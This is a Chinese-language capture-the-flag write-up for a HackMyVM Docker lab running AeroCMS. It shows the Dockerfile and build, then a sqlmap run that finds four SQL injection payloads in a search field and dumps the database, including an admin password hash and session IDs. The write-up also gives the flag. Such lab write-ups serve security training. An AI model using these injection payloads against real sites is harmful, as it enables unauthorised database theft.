跳到主要内容

Docker - 059

备注

created by || rick

⏲️ Release Date // 2024-01-07

💀 Solvers // 7

🧩 Type // docker

flag

HMV{h1kinG_1s_s0_fUn}

运行 docker

建议对 Dockerfile 做一定修改,便于加快镜像的编译

FROM php:7.3-apache

# apt 更换镜像源,并更新软件包列表信息
RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list &&
sed -i 's/security.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
RUN apt-get update

RUN apt update && apt install -y mariadb-server mariadb-client && apt install -y supervisor
RUN docker-php-ext-install mysqli

COPY . /var/www/html
RUN chmod -R 0755 /var/www/html

COPY config/supervisord.conf /etc/supervisord.conf

EXPOSE 80

CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]

编译镜像

randark@developer:~/code/h1ker-main$ docker build -t h1ker .
[+] Building 28.0s (13/13) FINISHED docker:default
=> [internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 597B 0.0s
=> [internal] load metadata for docker.io/library/php:7.3-apache 3.0s
=> [internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> CACHED [1/8] FROM docker.io/library/php:7.3-apache@sha256:b9872cd287ef72bc17d45d713aa2742f3d3bcf2503fea2506fd93aa94995219f 0.0s
=> [internal] load build context 0.0s
=> => transferring context: 7.15kB 0.0s
=> [2/8] RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list && sed -i 's/security.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list 0.2s
=> [3/8] RUN apt-get update 2.1s
=> [4/8] RUN apt update && apt install -y mariadb-server mariadb-client && apt install -y supervisor 12.7s
=> [5/8] RUN docker-php-ext-install mysqli 8.8s
=> [6/8] COPY . /var/www/html 0.0s
=> [7/8] RUN chmod -R 0755 /var/www/html 0.4s
=> [8/8] COPY config/supervisord.conf /etc/supervisord.conf 0.0s
=> exporting to image 0.6s
=> => exporting layers 0.6s
=> => writing image sha256:e7fc722a0803cff8b9db894d303f5cd07788e9f1de229c18d4cb31ec0b28d3c0 0.0s
=> => naming to docker.io/library/h1ker

然后基于镜像启动一个容器

randark@developer:~/code/h1ker-main$ docker run --name=h1ker -d -p 1337:80 h1ker
1ffb5859282779260f56679b425fd0db47ce2d12cfc96cc5190fa4e0f6400960
randark@developer:~/code/h1ker-main$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1ffb58592827 h1ker "docker-php-entrypoi…" 10 seconds ago Up 10 seconds 0.0.0.0:1337->80/tcp, :::1337->80/tcp h1ker

测试服务

access /

服务探测

在网站首页,发现一个搜索框,怀疑存在 sql 注入攻击的可能性,sqlmap 自动化测试看看

┌─[randark@parrot]─[~]
└──╼ $sqlmap -u http://192.168.163.135:1337/index.php --forms --batch
......
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: search (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: search=BxPV' OR NOT 6515=6515#&submit=

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=BxPV' AND (SELECT 4812 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (ELT(4812=4812,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IQIK&submit=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=BxPV' AND (SELECT 8834 FROM (SELECT(SLEEP(5)))dPAT)-- UhGJ&submit=

Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: search=BxPV' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x666868444e456363506f657a4157695a7863667459516b4b424554574654667379544a784d475644,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&submit=
---

数据库爬取

dbs
[*] aerocms
[*] information_schema
[*] mysql
[*] performance_schema
aerocms - tables
Database: aerocms
[5 tables]
+--------------+
| categories |
| comments |
| posts |
| users |
| users_online |
+--------------+

将表中的所有数据爬取下来

aerocms - tables - data
Database: aerocms
Table: users
[1 entry]
+---------+--------------------------------------------------------------+-------------------------------+----------+-----------+-------------------+------------+---------------+----------------+
| user_id | password | randSalt | username | user_role | user_email | user_image | user_lastname | user_firstname |
+---------+--------------------------------------------------------------+-------------------------------+----------+-----------+-------------------+------------+---------------+----------------+
| Admin | $2a$12$M8KMzrASFLbF.tEyC5bGRebyfk/.wyQn0yt39GbZi8TfixfgKo9Zm | $2y$10$iusesomecrazystrings22 | <blank> | <blank> | admin@example.net | admin | <blank> | 1 |
+---------+--------------------------------------------------------------+-------------------------------+----------+-----------+-------------------+------------+---------------+----------------+

Database: aerocms
Table: users_online
[23 entries]
+----+------------+----------------------------+
| id | time | session |
+----+------------+----------------------------+
| 1 | 1525603889 | pf2ovmbhtdn7dtrli83rjetlv6 |
| 2 | 1525600070 | g4eaojs9lup5uoi9clh0a7dlj2 |
| 3 | 1525600816 | u5b26mae8k9upvdf0loiv4qh80 |
| 4 | 1525603284 | 7dg0jaipc161dirait3omf4fk0 |
| 5 | 1525603543 | p9e0jf3ama3n4hvbp6eknime52 |
| 6 | 1525753912 | hqhn3mcl82dg0t12i01do5gkp2 |
| 7 | 1525837122 | krkd2v356t3jv5k5d2v6sa4om6 |
| 8 | 1525861608 | 04nli9lc34bfm8qnnbn0s47t63 |
| 9 | 1525925780 | drpe2pej7n3glgdkgltdu59ft1 |
| 10 | 1526038120 | nvqkpc95pdac56qmctcrm89jh0 |
| 11 | 1526200326 | 66isnml6mnu741n3r5q9s5m956 |
| 12 | 1526219068 | jdicp9b8bbek3opi4b7970lo02 |
| 13 | 1526268404 | 8o8u5o0gglhrok5fjobnrll0s0 |
| 14 | 1526273159 | ins7sdp4b5gbb079c4kv5hd734 |
| 15 | 1526306904 | rmtl5qd6uo6nadc4ql7fifcr47 |
| 16 | 1526312831 | 7d1vov1qav2kgbi18hrcgtcmd2 |
| 17 | 1526355967 | 7sjflm0u8i7qonakjs6341jdl1 |
| 18 | 1526395857 | 32hpoav8ksrhvi4qd7f5iisdh7 |
| 19 | 1526441933 | b51ki4eoffu1a3suqagcjcb662 |
| 20 | 1633389690 | 05t149k9ossbtvs3l0lb24u9up |
| 21 | 1633405608 | 5kavrpik2i0gl4cdskfif3c9gj |
| 22 | 1633487781 | 6ek6d59pvjf8a8a5dr7b7ivu5r |
| 23 | 1633487237 | 56sf778beevhfl7c95mhtvs1km |
+----+------------+----------------------------+

Database: aerocms
Table: categories
[2 entries]
+--------+---------------+
| cat_id | cat_title |
+--------+---------------+
| 1 | Default |
| 2 | Hiking Trails |
+--------+---------------+
注意

环境有点问题,没有办法进入后台,从而没有办法上传文件形成 webshell,也没有办法通过 sqlmap 形成 webshell